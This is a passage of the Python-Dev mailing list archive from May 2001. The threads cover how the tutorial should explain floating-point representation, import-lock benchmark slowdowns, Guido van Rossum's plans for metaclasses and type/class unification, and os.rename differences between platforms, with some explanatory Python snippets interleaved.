--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake at cj42289-a.reston1.va.home.com  Mon May 21 23:47:35 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Mon, 21 May 2001 17:47:35 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010521214735.BCCD428A10@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental updates to the Python 2.2 documentation.


From tim at digicool.com  Mon May 21 23:57:22 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 21 May 2001 17:57:22 -0400
Subject: [Python-Dev] FP vs. tutorial
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>

Let's get some errors cleared up first:

+ FixedPoint is not in the distribution.

+ There is no PEP for Decimal.

+ Decimal f.p. is not more accurate than binary f.p.  In fact, it's
  provably worse (but not by much).
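This is an illustration, not a proof, using today's decimal module: decimal arithmetic rounds too, just in base 10. Here 1/3*3 comes back inexact at 28 digits (the module's default precision). The binary double computation, by contrast, happens to round back to exactly 1.0. Other inputs go the other way.

```python
from decimal import Context, Decimal

ctx = Context(prec=28)                        # 28 significant decimal digits
third = ctx.divide(Decimal(1), Decimal(3))    # rounded to 28 digits
decimal_result = ctx.multiply(third, Decimal(3))
binary_result = (1 / 3) * 3                   # rounds back to exactly 1.0
```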

For the rest,

+ Yes, I'm serious about not including tutorial examples with
  platform-dependent output, unless they're explicitly meant to
  illustrate non-portable code.

+ Specific small examples notwithstanding, there is no uniformity
  across platforms in the last digit or so, because not even the IEEE-
  754 standard requires that (while C is much sloppier than 754), and
  vendors generally don't implement anything better than the minimum
  necessary when it comes to f.p. (Sun is a notable exception).

+ Happy to add text explaining the existence of surprises, and
  providing a URL.  Do the floating-point morons <wink> on Python-Dev
  find this one comprehensible?:

    http://www.lahey.com/float.htm


From guido at digicool.com  Tue May 22 00:33:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 18:33:17 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 17:57:22 EDT."
             <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com> 
References: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com> 
Message-ID: <200105212233.f4LMXH000648@odiug.digicool.com>

> + Yes, I'm serious about not including tutorial examples with
>   platform-dependent output, unless they're explicitly meant to
>   illustrate non-portable code.

Sure.  Most examples can be rewritten to avoid platform-dependent
output.  But there should be one section on floating-point
inaccuracies that shows a few of the kind of things you can expect on
a typical platform, and 1.1 -> 1.1000000000000001 is pretty common.
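That 17-digit output is what Python 2's repr() produced: it formatted floats with 17 significant digits, which is enough to round-trip any double. str(), by contrast, used 12 digits. Both can be reproduced with % formatting:

```python
x = 1.1

old_repr = "%.17g" % x   # 17 significant digits, as Python 2's repr() used
old_str = "%.12g" % x    # 12 significant digits, as Python 2's str() used
```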

> + Specific small examples notwithstanding, there is no uniformity
>   across platforms in the last digit or so, because not even the IEEE-
>   754 standard requires that (while C is much sloppier than 754), and
>   vendors generally don't implement anything better than the minimum
>   necessary when it comes to f.p. (Sun is a notable exception).

So we'll have to add something like "the actual inexact output you see
may differ from the inexact output in this example".

> + Happy to add text explaining the existence of surprises, and
>   providing a URL.  Do the floating-point morons <wink> on Python-Dev
>   find this one comprehensible?:
> 
>     http://www.lahey.com/float.htm

I was thinking more of immortalizing this one:

http://www.python.org/cgi-bin/moinmoin/RepresentationError

This can serve as a nice self-contained section on f.p. surprises.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From MarkH at ActiveState.com  Tue May 22 01:06:39 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Tue, 22 May 2001 09:06:39 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105212233.f4LMXH000648@odiug.digicool.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>

> > + Happy to add text explaining the existence of surprises, and
> >   providing a URL.  Do the floating-point morons <wink> on Python-Dev
> >   find this one comprehensible?:

Hey - I resemble that remark!

> >     http://www.lahey.com/float.htm

I quite liked the tone of this note.  The Python-dev morons probably could
make good sense of this, but only due to the relentless persistence of a
certain timbot.

If not for Tim, I would have forgotten completely about binary floating
point versus decimal floating point.  IIRC, me and about 40 other guys were
desperately trying to get the attention of the single CS female on the day
that lecture was given.  (Actually, that is a pretty safe bet - _all_
lectures were spent that way :)

However, without a little additional background I doubt the masses would be
able to get too far into this.

As Tim has said a few times, most people won't care - they just want it to
work!

> I was thinking more of immortalizing this one:
>
> http://www.python.org/cgi-bin/moinmoin/RepresentationError

IMO, this is a little worse.  There is less "background".  Eg, in almost the
first paragraph we see:

"""
Rewriting
    1        J
   ---  ~= ----
   10      2**N
"""

And I went "huh?  Where did J and N spring from?".  Reading a bit further
made it clear, but this document did seem a little impenetrable to floating
point or maths newbies.
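In the formula quoted above, J is the 53-bit integer significand of a double and N is the power of two that scales it, so J / 2**N is the double nearest to 1/10. The sketch below finds both. It assumes IEEE-754 doubles (53-bit significands, round-half-even) and a value between 0 and 1. `nearest_ratio` is a hypothetical helper.

```python
def nearest_ratio(numerator, denominator, bits=53):
    """Return (J, N) with J / 2**N the closest `bits`-bit binary fraction
    to numerator / denominator, where 2**(bits-1) <= J < 2**bits.

    Assumes 0 < numerator / denominator < 1; bits=53 matches a C double.
    """
    n = 0
    # Smallest N for which the truncated quotient already has `bits` bits.
    while (numerator << n) // denominator < (1 << (bits - 1)):
        n += 1
    j, r = divmod(numerator << n, denominator)
    # Round to nearest, ties to even.
    if 2 * r > denominator or (2 * r == denominator and j % 2 == 1):
        j += 1
    if j == 1 << bits:          # rounding carried into an extra bit
        j >>= 1
        n -= 1
    return j, n
```

For 1/10 this gives J = 7205759403792794 and N = 56, which reduces to the 3602879701896397 / 2**55 that `(0.1).as_integer_ratio()` reports.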

It seems to me that the RepresentationError document was written for people
with a decent background in maths - exactly the sort of people who _don't_
need such a document.

Just-my-0.020000002-cents-worth ly,

Mark.


From jeremy at digicool.com  Tue May 22 01:13:09 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Mon, 21 May 2001 19:13:09 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182107.RAA16214@cliff.concentric.net>
References: <200105182107.RAA16214@cliff.concentric.net>
Message-ID: <15113.41221.839653.822246@slothrop.digicool.com>

We looked at the SecondImport test case today.  It's a good test case
for programs that execute "import os" in a time-critical inner loop
:-).

The primary reason it is slower is the import lock that was added
after 1.5.2.  The benchmark, run in isolation, spends about 6 percent
of its time in the locking code.  Since it only spends about 20
percent of its time actually doing imports, this is a pretty
substantial cost.

It seems possible to eliminate some of the cost by using a special
marker in sys.modules that means: "This is not a module, but it's
being loaded by another thread."  But Guido doesn't sound interested
in optimizing programs with imports in inner loops.
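Below is a minimal sketch of the sys.modules marker idea. It uses a toy registry rather than the real import machinery, and `ToyImporter`, `_LOADING`, and the loader callable are all hypothetical. Already-loaded modules are returned without touching the lock, and a placeholder tells other threads that a load is in progress.

```python
import threading

_LOADING = object()   # hypothetical marker: "another thread is loading this"

class ToyImporter:
    """Toy model of import with a lock-free fast path (not the real machinery)."""

    def __init__(self, loader):
        self._loader = loader               # callable: name -> non-None module
        self._modules = {}                  # stand-in for sys.modules
        self._lock = threading.Lock()       # stand-in for the import lock
        self._changed = threading.Condition(self._lock)
        self.lock_acquisitions = 0

    def import_(self, name):
        module = self._modules.get(name)
        if module is not None and module is not _LOADING:
            return module                   # fast path: no lock at all
        with self._lock:
            self.lock_acquisitions += 1
            while self._modules.get(name) is _LOADING:
                self._changed.wait()        # another thread is loading it
            module = self._modules.get(name)
            if module is not None:
                return module
            self._modules[name] = _LOADING  # claim the load
        try:
            module = self._loader(name)     # run the loader outside the lock
        except BaseException:
            with self._lock:
                del self._modules[name]
                self._changed.notify_all()
            raise
        with self._lock:
            self._modules[name] = module
            self._changed.notify_all()
        return module
```

The toy does not cope with a module that imports itself recursively in the same thread: that thread would wait on its own marker. The real import lock is re-entrant for exactly that case.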

Jeremy


From tim at digicool.com  Tue May 22 01:20:16 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 21 May 2001 19:20:16 -0400
Subject: [Python-Dev] test_mailbox now fails on Windows
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEJGCAAA.tim@digicool.com>

Appears to be because new code uses os.link, which doesn't exist on Windows.
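One way a test can stay portable is to fall back to copying when os.link is missing or fails. Here is a sketch with a hypothetical `link_or_copy` helper, assuming the test only needs the second file to have the same contents:

```python
import os
import shutil

def link_or_copy(src, dst):
    """Hard-link src to dst where possible, else copy; report which was done."""
    link = getattr(os, "link", None)
    if link is not None:
        try:
            link(src, dst)
            return "link"
        except OSError:
            pass            # e.g. a filesystem without hard-link support
    shutil.copyfile(src, dst)
    return "copy"
```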

BTW, test_urllib2.py is still failing on Windows (and has been for a couple
of weeks).


From michel at digicool.com  Tue May 22 01:42:49 2001
From: michel at digicool.com (Michel Pelletier)
Date: Mon, 21 May 2001 16:42:49 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>
Message-ID: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>

On Tue, 22 May 2001, Mark Hammond wrote:

> > > + Happy to add text explaining the existence of surprises, and
> > >   providing a URL.  Do the floating-point morons <wink> on Python-Dev
> > >   find this one comprehensible?:
> 
> Hey - I resemble that remark!

As they say in the south, "mah-self"

> > >     http://www.lahey.com/float.htm
> 
> I quite liked the tone of this note.  The Python-dev morons probably could
> make good sense of this, but only due to the relentless persistence of a
> certain timbot.

I liked the tone too, but it really goes into a lot of detail, there's
this problem, and that one, oh and also *this* one and then there's *that*
and the other thing, and after a while you get the impression that
floating-point is for the insane.

> If not for Tim, I would have forgotten completely about binary floating
> point versus decimal floating point.  IIRC, me and about 40 other guys were
> desperately trying to get the attention of the single CS female on the day
> that lecture was given.  (Actually, that is a pretty safe bet - _all_
> lectures were spent that way :)

<sidetrack> 
The funny thing about that is we were in *Long Beach* (I
assume you mean IPC9), if you wanted to see beautiful, scarcely clothed
women in an acceptable public venue you wouldn't have had to go far, and
they would have probably had more interesting "significant bits" (it's
none of anyone's business where *I* was during the lectures ;).

Someone on the Zope list proposed P4W (Python for Women).  Poor, desperate
souls.  Obviously, P4E includes them too!!
</sidetrack>

> > I was thinking more of immortalizing this one:
> >
> > http://www.python.org/cgi-bin/moinmoin/RepresentationError
> 
> IMO, this is a little worse.

I agree.  Equations should not be needed to explain this.

-Michel


From MarkH at ActiveState.com  Tue May 22 01:47:06 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Tue, 22 May 2001 09:47:06 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEIMDNAA.MarkH@ActiveState.com>

> <sidetrack>
> The funny thing about that is we were in *Long Beach* (I
> assume you mean IPC9), if you wanted to see beautiful, scarcely clothed

Actually, I meant the computer science lectures all those years ago.
Literally one female.

And-not-much-has-changed ly,

Mark.


From guido at digicool.com  Tue May 22 05:22:40 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 23:22:40 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Tue, 22 May 2001 10:06:54 +1000."
             <B43D149A9AB2D411971300B0D03D7E8B90B70A@natasha.auslabs.avaya.com> 
References: <B43D149A9AB2D411971300B0D03D7E8B90B70A@natasha.auslabs.avaya.com> 
Message-ID: <200105220322.XAA13468@cj20424-a.reston1.va.home.com>

Hi Alan,

Thanks a lot for your input.  I am cc'ing this reply to python-dev
because I think my reply will be interesting for others.
(Python-dev'ers: Alan expressed concern that introducing Smalltalk
metaclasses would make Python unnecessarily complicated.)


The way my thinking is currently going, it's not likely that Python
will get a metaclass system similar to Smalltalk.  However, unifying
types and classes is useful for other reasons: please go to
http://python.sourceforge.net/peps/ to read PEP 252 which explains how
introspection can become simpler and more powerful by unifying the
introspection mechanisms for types and classes.

There will still be metaclasses, but the metaclasses will be less
important than in Smalltalk.  Class methods as commonly seen in
Smalltalk are not high on my priority list, and the metaclass
hierarchy won't be parallelling the regular class hierarchy.  Instead,
most metaclass programming will be done in C by programmers who want
to implement alternative class policies.

For example, the current class implementation gives each class a
__dict__ for methods and class variables, and dynamically searches the
class hierarchy for methods.  An alternative inheritance policy could
merge the __dict__ of the base class(es) with the __dict__ of the
derived class at class declaration time: this would make method lookup
a single dict lookup no matter how many levels of base classes are
involved, at the cost of making classes less dynamic, because a change
to a base class won't be seen in a derived class.  A metaclass
controls method lookup and class construction, and thus a different
metaclass can be used to change this policy for selected class
hierarchies without changing the default policy (which would be
backwards incompatible).
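A minimal sketch of that "merge at class creation time" policy, written as a metaclass in modern Python 3, where types.TypeType is simply `type`. FlatMeta is a hypothetical name invented for this illustration, not anything Python ships. It copies inherited attributes into each subclass's own __dict__, so a method lookup hits a single dict, but later changes to a base class are no longer seen by its subclasses:

```python
class FlatMeta(type):
    """Hypothetical metaclass: flatten inherited attributes into each class."""

    def __init__(cls, name, bases, namespace):
        super().__init__(name, bases, namespace)
        # Walk the MRO backwards (skipping the new class itself), so classes
        # earlier in the MRO overwrite later ones, as normal lookup would.
        for klass in reversed(cls.__mro__[1:]):
            if klass is object:
                continue
            for key, value in vars(klass).items():
                # Leave dunder machinery and the class's own definitions alone.
                if key.startswith("__") or key in namespace:
                    continue
                setattr(cls, key, value)


class Base(metaclass=FlatMeta):
    def greet(self):
        return "base"


class Derived(Base):
    pass


# The method was copied into Derived's own dict at class creation time...
print("greet" in Derived.__dict__)   # True
# ...so a later change to the base class is not seen by the subclass.
Base.greet = lambda self: "changed"
print(Derived().greet())             # base
```

With an ordinary class hierarchy, the last line would print "changed". That difference is the loss of dynamism described above.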

Other policies under control of a metaclass could include overriding
hooks for getattr and setattr, alternative mechanisms to store
instance variables (e.g. slot-based rather than dict-based), and so
on.
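Slot-based instance storage later appeared in the language as `__slots__`, which was new in Python 2.2 and so postdates this message. Here is a small Python 3 sketch that contrasts it with ordinary dict-based instances. The class names are made up for this example:

```python
class DictPoint:
    """Instance variables live in a per-instance __dict__."""
    def __init__(self, x, y):
        self.x, self.y = x, y


class SlotPoint:
    """Instance variables live in fixed slots; there is no __dict__."""
    __slots__ = ("x", "y")

    def __init__(self, x, y):
        self.x, self.y = x, y


d, s = DictPoint(1, 2), SlotPoint(1, 2)
print(d.__dict__)                 # {'x': 1, 'y': 2}
print(hasattr(s, "__dict__"))     # False
try:
    s.z = 3                       # not one of the declared slots
except AttributeError:
    print("SlotPoint rejects new attributes")
```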

While I think I can make it possible to write metaclasses in pure
Python (by subclassing types.TypeType), I expect that most
metaprogramming will be done in C, for performance reasons and for
maximum flexibility.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Tue May 22 05:55:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 23:55:26 -0400
Subject: [Python-Dev] RE: Rich comparison of lists and tuples
In-Reply-To: Your message of "Mon, 21 May 2001 03:53:24 EDT."
             <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com> 
Message-ID: <200105220355.XAA13678@cj20424-a.reston1.va.home.com>

> [Guido]
> > I would like to break this down by defining the mapping between cmp()
> > and rich comparisons.

[Tim]
> Good idea!

Followed by many nitpicking questions about what I meant.  As a matter
of process, I think it's better to try to channel instead of challenge
me.  I just don't seem to have the concentration necessary to come up
with all the details needed to make this worthy of a language
definition, and you do.

If you want a BDFL proclamation on currently gray areas in the rules,
or a reversal of what the current implementation does in some cases,
please draft a definition with a few leading questions.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Tue May 22 06:02:18 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 22 May 2001 00:02:18 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKGKDAA.tim.one@home.com>

[Mark Hammond, on http://www.lahey.com/float.htm]

> I quite liked the tone of this note.  The Python-dev morons probably could
> make good sense of this, but only due to the relentless persistence of a
> certain timbot.
>
> If not for Tim, I would have forgotten completely about binary floating
> point versus decimal floating point.  IIRC, me and about 40 other guys
> were desperately trying to get the attention of the single CS female on
> the day that lecture was given.  (Actually, that is a pretty safe bet -
> _all_ lectures were spent that way :)

I remember guys like you.  Well guess what?  You ended up with a baby, while
I'm known on two continents as the author of tabnanny.py.  Ha!  Revenge is a
dish best eaten cold <burp>.

> However, without a little additional background I doubt the masses would
> be able to get too far into this.

There's only so much you can say to unmotivated people who are also unwilling
to learn.  That's not my problem.  Finding them a gentle intro from which
they *could* learn isn't either, but typing a URL is easy enough that I don't
mind.

Here:  I want to script MS Word with Python.  I don't know COM and refuse to
learn anything about it.  I'd rather not install win32all either, and import
statements confuse me.  Why don't you make it easy for me?  It's the same
thing -- you can point them at what they need to learn if they're serious,
else they're simply out of luck.

[And on]
>> http://www.python.org/cgi-bin/moinmoin/RepresentationError
>
> IMO, this is a little worse.

In one sense it's much worse:  it's only trying to explain a single cause of
fp surprises.  OTOH, it explains it precisely while giving the reader the
tools needed to do an exact analysis of any case of that particular class.
The Lahey link touches on all the common sources of surprises, but leaves
them fuzzy.

> There is less "background".  Eg, in almost the first paragraph we see:
>
> """
> Rewriting
>     1        J
>    ---  ~= ----
>    10      2**N
> """
>
> And I went "huh?  Where did j and N spring from?".  Reading a bit further
> made it clear, but this document did seem a little impenetrable to
> floating point or maths newbies.

It did its job for them if it simply scared them <0.5 wink>.

> It seems to me that the RepresentationError document was written for
> people with a decent background in maths -

There's nothing more complicated than integer division there.
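To back that up, here is a sketch in modern Python that computes the J and N in the page's 1/10 ~= J/2**N using only integer shifts and divmod. It assumes IEEE-754 doubles, where J must have exactly 53 bits. The function name binary_approximation is made up:

```python
from fractions import Fraction


def binary_approximation(num, den, precision=53):
    """Return (J, N) so that J / 2**N is the closest fraction to num/den
    whose numerator J has exactly `precision` bits (assumes 0 < num/den < 1)."""
    N = 0
    # Smallest N for which num * 2**N // den reaches `precision` bits.
    while (num << N) // den < (1 << (precision - 1)):
        N += 1
    J, remainder = divmod(num << N, den)
    # Round to nearest; on an exact tie, round to even.
    if 2 * remainder > den or (2 * remainder == den and J & 1):
        J += 1
    # Rounding up can carry into an extra bit; renormalize if so.
    if J == 1 << precision:
        J >>= 1
        N -= 1
    return J, N


J, N = binary_approximation(1, 10)
print(J, N)                                # 7205759403792794 56
print(Fraction(J, 2**N) == Fraction(0.1))  # True: exactly the stored double
```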

> exactly the sort of people who _don't_ need such a document.

They actually do:  regardless of math background, nothing about f.p. is
obvious before studying f.p. as a subject in its own right.  It's "not like"
anything else, and in previous lives I spent a good chunk of my work time
explaining the same stuff to doctorates.  Mathematicians were actually the
hardest audience at first, perhaps because they had the hardest time
admitting they didn't already understand it; after getting beyond bruised
professional pride, though, they were the easiest audience to bring up to
speed.


From tim at digicool.com  Tue May 22 06:58:21 2001
From: tim at digicool.com (Tim Peters)
Date: Tue, 22 May 2001 00:58:21 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>

[Michel Pelletier, on http://www.lahey.com/float.htm]
> I liked the tone too, but it really goes into a lot of detail, there's
> this problem, and that one, oh and also *this* one and then there's
> *that* and the other thing, and after a while you get the impression
> that floating-point is for the insane.

Using an unfamiliar power tool with sharp edges, and while blindfolded, is
insane.

[and on http://www.python.org/cgi-bin/moinmoin/RepresentationError]

> I agree.  Equations should not be needed to explain this.

There's exactly one equation on that page, saying that one ratio of two
integers is approximately equal to another ratio of two integers.  If that's
too much for you, and you weren't satisfied with the *initial* hand-wavy
explanation ("1/10 is not exactly representable as a binary fraction")
either, then it's up to you to do better than the latter without actually
saying anything useful <wink>:

Q:  Why is Python broken:

    >>> 0.1
    0.10000000000000001

A:  [your turn]
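For readers following along in a current Python, here is a sketch of where that output comes from. Python 2.1's repr() printed 17 significant digits, which is enough to round-trip any double. The double nearest 0.1 is slightly larger than 0.1. Python 2.7 and 3.1 later switched repr() to the shortest string that round-trips, so the last line differs from what Python 2.1 showed:

```python
from decimal import Decimal

x = 0.1
print("%.17g" % x)                        # 0.10000000000000001  (2.1-style repr)
print(Decimal(x))                         # exact value of the double nearest 0.1
print(float("0.10000000000000001") == x)  # True: both strings name the same double
print(repr(x))                            # 0.1  (modern shortest round-trip repr)
```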


From gward at python.net  Tue May 22 15:41:57 2001
From: gward at python.net (Greg Ward)
Date: Tue, 22 May 2001 09:41:57 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>; from tim@digicool.com on Mon, May 21, 2001 at 05:57:22PM -0400
References: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>
Message-ID: <20010522094157.A1245@gerg.ca>

On 21 May 2001, Tim Peters said:
> + Happy to add text explaining the existence of surprises, and
>   providing a URL.  Do the floating-point morons <wink> on Python-Dev
>   find this one comprehensible?:
> 
>     http://www.lahey.com/float.htm

I found this article more useful, interesting, and informative than
whatever I learned about binary floating-point in my academic years.
Good link, Tim.  Two catches:

  * I can just barely follow the FORTRAN examples; I very much doubt
    the average Python newbie would have any more luck than me

  * I tried several of the FORTRAN examples in Python, and did not
    witness any of the gotchas they are meant to illustrate.  Possibly
    it's just a single-precision vs. double-precision difference, but
    Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2
    doesn't demonstrate the same gotchas as that article does.
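Greg's guess is easy to check from Python, whose floats are C doubles. The sketch below pushes a value through single precision with the struct module. It assumes the platform's C float and double are IEEE 754 single and double, which holds on essentially all current hardware. to_single is a made-up helper name:

```python
import struct


def to_single(x):
    """Round a Python float (a C double) to the nearest single-precision value."""
    return struct.unpack("f", struct.pack("f", x))[0]


print(repr(to_single(0.1)))       # 0.10000000149011612
print(abs(to_single(0.1) - 0.1))  # roughly 1.5e-9 of representation error
print(to_single(0.5) == 0.5)      # True: 0.5 is exact in both formats
```

The double nearest 0.1 is off by only about 5.6e-18. Surprises that are glaring in single-precision FORTRAN can therefore shrink below what a few printed digits reveal in Python.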

        Greg
-- 
Greg Ward - geek                                        gward at python.net
http://starship.python.net/~gward/
Ban the bomb -- save the world for conventional warfare.


From skip at pobox.com  Tue May 22 18:01:40 2001
From: skip at pobox.com (skip at pobox.com)
Date: Tue, 22 May 2001 11:01:40 -0500
Subject: [Python-Dev] type/class unification and ExtensionClass
Message-ID: <15114.36196.4677.99240@beluga.mojam.com>

I know Guido has recently been working on some of the type/class unification
issues (PEPs 252 and 253).  Will this affect ExtensionClass?  In particular,
will it go away or have to be reworked significantly for Python 2.2 or 2.3?
The new PyGtk wrappers use the ExtensionClass module.  I'm curious about how
hard it would be to move away from ExtensionClass for these wrappers.  My
reading of PEP 253 suggests this shouldn't be too difficult.

I'd ask Guido directly, but I figure other people on this list might also
have useful input on the issue and/or be able to answer, saving him the
time.  At any rate, he will see it posted here just the same.

Thx,

Skip


From guido at digicool.com  Tue May 22 18:23:52 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 12:23:52 -0400
Subject: [Python-Dev] type/class unification and ExtensionClass
In-Reply-To: Your message of "Tue, 22 May 2001 11:01:40 CDT."
             <15114.36196.4677.99240@beluga.mojam.com> 
References: <15114.36196.4677.99240@beluga.mojam.com> 
Message-ID: <200105221623.f4MGNqC02110@odiug.digicool.com>

> I know Guido has recently been working on some of the type/class unification
> issues (PEPs 252 and 253).

And I'm not done yet. :-)

> Will this affect ExtensionClass?  In particular,
> will it go away or have to be reworked significantly for Python 2.2 or 2.3?

Probably.  Jim Fulton in particular asked me to work on this because
he wants to phase out ExtensionClass.

> The new PyGtk wrappers use the ExtensionClass module.  I'm curious about how
> hard it would be to move away from ExtensionClass for these wrappers.  My
> reading of PEP 253 suggests this shouldn't be too difficult.

I don't think so either.

> I'd ask Guido directly, but I figure other people on this list might also
> have useful input on the issue and/or be able to answer, saving him the
> time.  At any rate, he will see it posted here just the same.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From michel at digicool.com  Tue May 22 23:44:09 2001
From: michel at digicool.com (Michel Pelletier)
Date: Tue, 22 May 2001 14:44:09 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>
Message-ID: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>

On Tue, 22 May 2001, Tim Peters wrote:

> [Michel Pelletier, on http://www.lahey.com/float.htm]
> > I liked the tone too, but it really goes into a lot of detail, there's
> > this problem, and that one, oh and also *this* one and then there's
> > *that* and the other thing, and after a while you get the impression
> > that floating-point is for the insane.
> 
> Using an unfamiliar power tool with sharp edges, and while blindfolded, is
> insane.

I should have been more clear, I liked the first couple of paragraphs for
their descriptions, and there is certainly nothing wrong with the document
as it stands, but such an explanation would be a bit too lengthy and
boring to a typical fifth grader or photoshop guru going through the
Tutorial and dabbling in programming for the very first time.

> [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError]
> 
> > I agree.  Equations should not be needed to explain this.
> 
> There's exactly one equation on that page, saying that one ratio of two
> integers is approximately equal to another ratio of two integers.

Who was it that said every equation will halve your audience?  I agree
with that, the tutorial should try to be as broad and simple as possible.

> If that's
> too much for you, and you weren't satisfied with the *initial* hand-wavy
> explanation ("1/10 is not exactly representable as a binary fraction")
> either, then it's up to you to do better than the latter without actually
> saying anything useful <wink>:

The latter is fine, although I think the first document hand-waves better.  

-Michel


From skip at pobox.com  Tue May 22 23:54:42 2001
From: skip at pobox.com (skip at pobox.com)
Date: Tue, 22 May 2001 16:54:42 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
Message-ID: <15114.57378.887742.531145@beluga.mojam.com>

Couldn't figure out why this message never generated any comment.  Turns out
it didn't reach the list because the host I sent it from
(dynamic4.tttech.com) couldn't be resolved.  I just noticed it in my errors
mailbox and am sending it out again.

------------------------------------------------------------------------------
It was brought to my attention a week ago by a client that os.rename
semantics differ between Unix and Windows.  On Unix, if the destination file
already exists it is silently deleted.  On Windows, an exception is raised.
I was able to verify this for Python 2.0 on Windows98.  I assume nothing
changed for 2.1, but I can't verify that.  (Windows trashed my partition
table and my Linux root partition while I was downloading 2.1.
Consequently, I no longer run Windows.  Take that, Bill...)  I haven't
checked the Mac yet (will do that when I get back to the US), but I think
that os.rename should have the same semantics across all platforms.  To the
extent reasonably possible, I think this should also be true of other common
functions exposed through the os module.

On the (unsupportable) theory that to-date, more Python apps have been
written and/or deployed on Unix-like systems and that where Windows apps are
concerned, many developers will have added a thin wrapper to mimic the Unix
semantics, I think less breakage would result if the Unix semantics were
implemented in the Windows version.  It appears that is what POSIX
compliance would demand as well.

Skip


From fdrake at acm.org  Tue May 22 23:55:29 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 22 May 2001 17:55:29 -0400 (EDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
References: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>
	<Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <15114.57425.540688.205255@cj42289-a.reston1.va.home.com>

Michel Pelletier writes:
 > as it stands, but such an explanation would be a bit too lengthy and
 > boring to a typical fifth grader or photoshop guru going through the
 > Tutorial and dabbling in programming for the very first time.

  But that's not the audience the Python Tutorial is targeted to --
readers are expected to be essentially competent in at least one "3rd
generation" language.  Maybe a few will shy away from a simple
equation, but not so many.  Those who do would do well to shy away
from FP as well.  ;-)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Wed May 23 00:04:11 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 22 May 2001 18:04:11 -0400 (EDT)
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <15114.57378.887742.531145@beluga.mojam.com>
References: <15114.57378.887742.531145@beluga.mojam.com>
Message-ID: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com>

skip at pobox.com writes:
 > On the (unsupportable) theory that to-date, more Python apps have been
 > written and/or deployed on Unix-like systems and that where Windows apps are
 > concerned, many developers will have added a thin wrapper to mimic the Unix
 > semantics, I think less breakage would result if the Unix semantics were

  I don't know whether there are more deployed Python apps on Unix
than on Windows (and I've no good idea about how to find out), but I
think unifying the semantics one way or the other is a good thing.
Regardless of which set of semantics is chosen.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From mwh at python.net  Wed May 23 00:07:12 2001
From: mwh at python.net (Michael Hudson)
Date: 22 May 2001 23:07:12 +0100
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Michel Pelletier's message of "Tue, 22 May 2001 14:44:09 -0700 (PDT)"
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>

Michel Pelletier <michel at digicool.com> writes:

